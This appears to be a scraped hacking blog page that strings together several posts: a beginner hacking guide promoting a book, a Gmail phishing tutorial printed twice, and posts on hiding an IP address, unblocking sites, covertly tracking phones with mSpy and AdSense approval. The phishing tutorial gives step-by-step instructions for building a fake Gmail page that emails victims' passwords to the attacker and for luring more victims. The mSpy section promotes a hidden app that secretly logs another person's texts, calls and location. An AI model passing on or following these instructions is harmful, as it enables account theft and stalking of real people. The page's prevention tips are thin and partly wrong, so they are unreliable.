Are you a beginner who wants to learn hacking but don’t know where to start? If so you are at the right place. Since most of the books and free resources on the Internet are only meant for those who already have a considerable amount of knowledge on the subject, they fail to teach hacking for beginners. Therefore, I have decided to come up with this post that gives useful tips for beginners on how to kick start their journey to becoming a hacker.

What is the Best Way to Learn Hacking for Beginners?

Consider the following steps:

Step-1: Begin with the Basics

For beginners who have little or no previous knowledge of hacking, it is always better to start off from the basics. Instead of directly learning how to hack, you can begin exploring more about topics such as computer networks, network ports, firewalls, common network protocols like IP address, HTTP, FTP, DNS, SMTP etc. along with how each of those stuffs work.

You can also begin to learn more about alternate operating systems Linux whose knowledge becomes very much essential in the field of hacking. The more you learn about the basics, the more easy it is to find vulnerabilities and device exploits. Once you develop a basic understanding of the fundamental concepts, you will be in a position to easily understand various hacking techniques that are in practice.

Step-2: Find a Good Source to Start Learning

If one has a fair amount of experience in the field of hacking, there exists so many books and websites that give out technical information on latest vulnerabilities along with possible ways to exploit them. However, for beginners it is hard to find sources that teach hacking right from the basics in a simple and easy to follow manner.

So, I decided to put together all my 10+ years of experience in the field and come up with a book for beginners called Hacking Secrets Exposed which demands no prior knowledge of the topic and is easy for the readers to follow and understand at every step. This book also comes packed with all the necessary fundamental concepts (as mentioned in the step-1) so that readers can find them all at one place. Therefore, I recommend this book for all those beginners who have a dream to start off their journey to becoming a hacker. This is an excellent source of knowledge for all those who have a little or no prior background of hacking. For more information on this book, you can visit the official website from the following link: howtohack.gohacking.com.

Step-3: Learn Programming (Optional)

If you want to take your hacking skills one step ahead, programming is something that you can’t skip down. Although you can easily find a lot of ready made tools and programs that let you hack with ease, it is always better to have some basic knowledge of programming languages like PHP and JavsScript so that you will be in a position to develop your own tools and exploit codes. However, if you do not wish to learn programming you can skip this step and still be a good hacker.

How Long does it Take to Master the Skills of Hacking?

Since hacking is not something that can be mastered overnight, you should never be in a hurry to get going. It requires knowledge, skills, creativity, dedication and of course the time. Depending upon the amount of effort and dedication you put, it can take up anywhere between a few months to few years to develop all the the necessary skills. Everyone can become a hacker provided they learn it from the basics and build a solid foundation. So, if you want to be a hacker all you need is passion to learn, a good source of knowledge that will guide you through the basics and some perseverance.

Hacking Gmail Using Psiphing Method And Prevention

Hello, in this tutorial you will learn how to Hacking GMail Using Phishing Method and Prevention utilizing Wapka that send the passwords,Gmail id,browser and IP address of the victim to your email id.

About Wapka

Wapka is free website creation platform with free website hosting where we can create phising website in minute and good thing about wapka is that it is very user friendly and we don’t need to much deep info about PHP or MySql.

A huge advantage provided by wapka is that it doesn’t block our account while we are performing our phishing attack as other free hosting websites does.

Audience

This tutorial is designed for everyone who like hacking but don’t want to learn high coding skills.

Requirements

A mail account for registration.
Basic knowledge of HTML.
Basic knowledge of Gmail.
Basic knowledge of Website Creation.
A Victim
Overview

We are going to create a phishing website which will looks like Gmail mobile website and send us victim details in our email id with passwords , email id , IP address and browser information.

Purpose of this tutorials and how will it benefit to you.

I always want to learn hacking from childhood but the main problems is hacking is not easy at its shows in movie .It need a lot of technical knowledge like coding skills , programming and a lot more.

This is the situation when we need this tutorial come into light. Phishing is the easiest method to hack Facebook and Gmail account.Phishing doesn’t need any type of technical knowledge. You can create a phishing website just by copy and paste in a simple page of HTML code.

Step by Step Guide Hacking GMail Using Phishing Method and Prevention:

1. Register a new Wapka Account First create a new wapka account by clicking here.

2. Now login to your account and go to Site List and create a new site.

3. Enter site name [ using a to z character and 0 to 9 numbers , no special character allowed]

4. In my case, I have created newgmail21@wapka.mobi Then click on Manage. You will find this screen.

5. Now you have 2 modes available, Click on Admin mode.

6. As you click on Admin mode you redirects to a Blank page. it’s blank because till now you do nothing to your newly created site. At the Lower right most corner you have a link ::EDIT SITE(#):: click on it.

7. You will see this screen with lot of option Now you need to click at Mail form.

8. You will get following screen .Enable CAPTCHA pictures: (uncheck it).

Now press Submit & Remember Don’t set it admin mode.

9. Now Your need your site id to get victim details at your registered email id.

Step by Step to get your site id Follow the steps:9a. Go to site list then click on your site. Don’t click on admin mode , Scroll down and click on source code viewer.

9b. and now put your site link in the box then you will find this . Check Value [In My Case It Is 184249271 ] and note it.

Now the main work of this tutorial is collecting like the value=”184249271″ code by source. You need to search that value carefully.

10. After Getting the value=”XXXXXXXX” code you must hide the mailform in Admin Mode. To hide it on Admin Mode.

Click at your site than admin mode .Now here you will find blank site. Just Click it “Edit site ” like step no 3, then click Users.

Click at Items visibility and choose X from drop down menu.

Now it’s Done. Here is the Final steps.

11. Click on your site in admin mode then click Edit site than WML/XHTML code and paste there this phishing code.

CLICK TO DOWNLOAD CODE

12. Replace the value=”XXXXXXX” to yours. This is how your newly made phishing website will look.

13. Now the main Question that How can i get The Hacked Username and Password? When some one will enter details about his/her in your phishing site you will get a email from wapka.mobi like this and you will get the hacked User name & Password [With IP Address and Browser ] at your Mail inbox which you have used in Wapka.mobi Registration.

Addition Note

You can not share wapka url at Facebook as they have blocked all wapka url.
You can not surf wapka site in India because Government of India blocked all wapka site from January ,2016. [You need to use proxy site to to perform all above task.]
How Attacker Get more victim

They Shorten their phishing website url.
They share URL in whatsapp/viber group where people don’t have understanding about computer security.
They use social engineering to get more victims.
They send this URL by email to victims.
How to prevent yourself from Hacking GMail Using Phishing Method attacks

Check the URL bar and make sure it has “https” because every Google site enables https.
Don’t click any link in Whatsapp, social media and in SMS which claims “Free Offer, Free Lottery ,Free Insurance,Free Net” etc.
Don’t Click any unknown email especially from girls name . This is one of social engineering tricks.

Conclusion

The best method to getting more clients is social engineering and same the best method to prevent yourself from phishing is “not to catch yourself in social engineering “.

Hacking Gmail Using Psiphing Method And Prevention

Hello, in this tutorial you will learn how to Hacking GMail Using Phishing Method and Prevention utilizing Wapka that send the passwords,Gmail id,browser and IP address of the victim to your email id.

About Wapka

Wapka is free website creation platform with free website hosting where we can create phising website in minute and good thing about wapka is that it is very user friendly and we don’t need to much deep info about PHP or MySql.

A huge advantage provided by wapka is that it doesn’t block our account while we are performing our phishing attack as other free hosting websites does.

Audience

This tutorial is designed for everyone who like hacking but don’t want to learn high coding skills.

Requirements

A mail account for registration.
Basic knowledge of HTML.
Basic knowledge of Gmail.
Basic knowledge of Website Creation.
A Victim
Overview

We are going to create a phishing website which will looks like Gmail mobile website and send us victim details in our email id with passwords , email id , IP address and browser information.

Purpose of this tutorials and how will it benefit to you.

I always want to learn hacking from childhood but the main problems is hacking is not easy at its shows in movie .It need a lot of technical knowledge like coding skills , programming and a lot more.

This is the situation when we need this tutorial come into light. Phishing is the easiest method to hack Facebook and Gmail account.Phishing doesn’t need any type of technical knowledge. You can create a phishing website just by copy and paste in a simple page of HTML code.

Step by Step Guide Hacking GMail Using Phishing Method and Prevention:

1. Register a new Wapka Account First create a new wapka account by clicking here.

2. Now login to your account and go to Site List and create a new site.

3. Enter site name [ using a to z character and 0 to 9 numbers , no special character allowed]

4. In my case, I have created newgmail21@wapka.mobi Then click on Manage. You will find this screen.

5. Now you have 2 modes available, Click on Admin mode.

6. As you click on Admin mode you redirects to a Blank page. it’s blank because till now you do nothing to your newly created site. At the Lower right most corner you have a link ::EDIT SITE(#):: click on it.

7. You will see this screen with lot of option Now you need to click at Mail form.

8. You will get following screen .Enable CAPTCHA pictures: (uncheck it).

Now press Submit & Remember Don’t set it admin mode.

9. Now Your need your site id to get victim details at your registered email id.

Step by Step to get your site id Follow the steps:9a. Go to site list then click on your site. Don’t click on admin mode , Scroll down and click on source code viewer.

9b. and now put your site link in the box then you will find this . Check Value [In My Case It Is 184249271 ] and note it.

Now the main work of this tutorial is collecting like the value=”184249271″ code by source. You need to search that value carefully.

10. After Getting the value=”XXXXXXXX” code you must hide the mailform in Admin Mode. To hide it on Admin Mode.

Click at your site than admin mode .Now here you will find blank site. Just Click it “Edit site ” like step no 3, then click Users.

Click at Items visibility and choose X from drop down menu.

Now it’s Done. Here is the Final steps.

11. Click on your site in admin mode then click Edit site than WML/XHTML code and paste there this phishing code.

CLICK TO DOWNLOAD CODE

12. Replace the value=”XXXXXXX” to yours. This is how your newly made phishing website will look.

13. Now the main Question that How can i get The Hacked Username and Password? When some one will enter details about his/her in your phishing site you will get a email from wapka.mobi like this and you will get the hacked User name & Password [With IP Address and Browser ] at your Mail inbox which you have used in Wapka.mobi Registration.

Addition Note

You can not share wapka url at Facebook as they have blocked all wapka url.
You can not surf wapka site in India because Government of India blocked all wapka site from January ,2016. [You need to use proxy site to to perform all above task.]
How Attacker Get more victim

They Shorten their phishing website url.
They share URL in whatsapp/viber group where people don’t have understanding about computer security.
They use social engineering to get more victims.
They send this URL by email to victims.
How to prevent yourself from Hacking GMail Using Phishing Method attacks

Check the URL bar and make sure it has “https” because every Google site enables https.
Don’t click any link in Whatsapp, social media and in SMS which claims “Free Offer, Free Lottery ,Free Insurance,Free Net” etc.
Don’t Click any unknown email especially from girls name . This is one of social engineering tricks.

Conclusion

The best method to getting more clients is social engineering and same the best method to prevent yourself from phishing is “not to catch yourself in social engineering “.

How To Change Your Ip Address

Every time you connect to the Internet, your ISP (Internet Service Provider) assigns an IP address to your computer that makes it possible for websites and applications to keep track of your online activities and also pin point your physical location. Therefore, in order to protect your Internet privacy, it is often necessary to change your IP address.

Ways to Change IP Address

The following are some of the possible ways to change IP address of your computer:

1. Using a VPN: Best Way to Change IP Address

Even though there are several methods to change your IP address, using a VPN proxy is by far the best and most secure way. The following are some of the most popular VPN proxies that most Internet users prefer:
-Hide my ass ----IP changer application

-vyprVPN-----another best IP changer

Easiest Way To Hide Your Ip Adress

2. Web Based Proxies

This is another popular way to quickly hide IP address on the Internet. Following are some of the popular web based proxies to conceal your IP address:

www.proxysite.com
www.newipnow.com
www.filterbypass.me
The downside of using these free proxy services to mask your IP address is that most of them are overloaded and are too slow to use. In addition, your security and privacy may get compromised during the usage.

What is the Best Way to Hide IP Address?

I have made a sincere attempt to present you with all available options to hide your IP address. If you only want to conceal your IP address for a specific amount of time and are not concerned with the security and performance, go for the free web based proxy services.

On the other hand, if you have the necessity to hide IP address on a regular basis, need high security and performance, go for paid VPN services like Hide My Ass or VyprVPN.

How to Ensure Your IP Change?

To make sure your IP is changed, just type ‘my IP address’ on Google before and after using any of the above services. Just compare both the IP addresses and make sure they are different. If yes, that means you have successfully changed your IP address.

How To Unblock Websites In Quick Time

ome of your favorite websites may be blocked by your school or company for reasons such as saving the bandwidth or improving productivity during work hours. Sometimes a government or ISP may suddenly block websites to impose Internet censorship resulting in real pain and inconvenience for the users. If you are an individual facing such inconvenience and want to unblock websites to bypass restrictions this article can help you out.

Ways to Unblock Websites

There exists several ways to unblock websites where some are easy and some are difficult to implement. Also, there are many obsolete methods that will not work in the present day scenario. Therefore, I am presenting only those methods that I have tested and found to be working as listed below:

1. Using a VPN Proxy – The Best Way

Using a VPN proxy is one of the easiest and best method to unblock any website in quick time. It is fast, secure and extremely reliable during all times of usage. Since it acts as an intermediary between your computer andDownload sites you browse your real identity such as location and IP address remain obscured to the outside world. Some of the popular VPN proxies are listed below:

1. Hide My Ass VPN – Hide My Ass is one of the most popular VPN service for unblocking any website with ease.

Download Hide My Ass VPN

2. VyprVPN – VyprVPN offers the world’s fastest VPN services backed by 30-day money back guarantee.

Download VyprVPN

HOW TO TRACK CELL PHONES

HOW TO TRACK CELL PHONES
     
!Are You Looking to Track a Cell Phone Location? Relax, Here is a Complete Cell Phone Tracking Guide


hi readers i know most of you are eager to know how to track cell phones
and today i am here to quench your curiousne thirst

LETS START:
 

1. How to Track a Cell Phone that Belongs to Someone Else?

 If you need to track someone else’s phone such as your children or employees, you can simply use a cell phone tracking app such as mSpy Premium. This is a very small app that can be installed in just a few simple steps and takes only 2-3 minutes to complete. Once installed the app stays hidden on the phone but keeps track of every activity on the phone including its GPS location, Call Logs, Text Messages and more.

 

mSpy Premium Features:
  • GPS Location Tracking: GPS positions are uploaded at a time interval you select with a link to the map.
  • Track Text Messages & Emails: Every text message sent and received including SMS and emails are logged even if the phone logs are deleted.
  • Call Logs: Each incoming and outgoing number on the phone is logged along with duration, date and time stamp.
  • Phone Contacts: Get access to complete contact list on the target phone.
  • Browser History: All websites visited on the phone are logged.
  • Social Networking & Messenger Activity: All social media activity such as Facebook, Twitter, LinkedIn, WhatsApp, Skype, iMessages, Instagram and many more are recorded.
You will have to download and install the app onto the target phone of whose location and activities you want to track. Installation takes only a few minutes during which you should have the target phone in your hand.
Once the installation is complete, the tracking process will begin immediately and the recorded logs are silently uploaded to your mSpy account as shown in the above demo. You can login to your secure online account from your computer or phone at any time to view the logs containing GPS location, Call activities Text Messages and more. You can download mSpy Premium from the link below

NOTE: Supported phones for mspyware are Android, iPhone, iPad and Tablets.



2.HOW TO TRACK LOST ANDROID PHONE
if you need to track lost android phone you can follow these steps mention below


1.
Download Android Device Manager from Google play store and install it on another android device. This app lets you track your stolen android phone and also lets to remotely lock or erase all the data on it.


2
 From “Android Device Manager” log into your Google account using the same ID associated with your lost phone. After successful login this app will attempt to locate your device and show its last known location on the map

3.
 In addition, you will also be able to perform several actions on your lost phone such as give a Ring, Lock the device or Erase all the data stored on it

                                                        E N J O Y     H A C K I N G
 

 

DOWNLOAD GOOGLE ADSENSE FAST APPROVAL TUTORIAL VIDEO

This tutorial is an AdSense tutorial that will fee d you on how to get your Google AdSense approved in three days 

Most bloggers are not earning from their blog due to the fact that Google does not approve their blog

Well VANTARCE.....is now helping you 

Download the video

Watch 

Enjoy 

And learn

CLICK HERE TO DOWNLOAD THE VIDEO